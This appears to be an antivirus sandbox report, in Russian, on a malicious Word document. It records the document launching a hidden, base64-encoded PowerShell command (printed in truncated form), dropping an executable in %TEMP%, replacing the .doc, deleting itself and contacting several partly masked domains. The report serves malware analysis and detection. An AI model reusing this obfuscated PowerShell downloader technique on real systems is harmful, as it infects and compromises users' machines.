Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB7AFcAcwBjAGAAUgBJAGAAcAB0AH0AIAA9ACAAJgAoACIAewAyAH0AewAwAH0AewAxAH0AIgAtAGYAIAAnAGoAJwAsACcAZQBjAHQAJwAsACcAbgBlAHcALQBvAGIAJwApACAALQBDAG8AbQBPAGIAagBlAGMAdAAgACgAIgB7ADAAfQB7ADIAfQB7AD...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\56133.exe
- <Текущая директория>\~wrd0000.tmp
- <Текущая директория>\~wrd0001.tmp
Удаляет следующие файлы
- <Текущая директория>\~wrd0000.tmp
Изменяет следующие файлы
Подменяет следующие файлы
- <PATH_SAMPLE>.doc
Самоудаляется.
Сетевая активность
Подключается к
- 'fo####oys.com.br':80
- 'lu##jem.com':80
- 'sh##iss.com':80
- 'ne####smedia.co.uk':80
TCP
Запросы HTTP GET
- http://ne####smedia.co.uk/cgi-sys/suspendedpage.cgi
UDP
- DNS ASK tr####cameron.com
- DNS ASK fo####oys.com.br
- DNS ASK lu##jem.com
- DNS ASK sh##iss.com
- DNS ASK ne####smedia.co.uk
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB7AFcAcwBjAGAAUgBJAGAAcAB0AH0AIAA9ACAAJgAoACIAewAyAH0AewAwAH0AewAxAH0AIgAtAGYAIAAnAGoAJwAsACcAZQBjAHQAJwAsACcAbgBlAHcALQBvAGIAJwApACAALQBDAG8AbQBPAGIAagBlAGMAdAAgACgAIgB7ADAAfQB7ADIAfQB7AD...' (со скрытым окном)
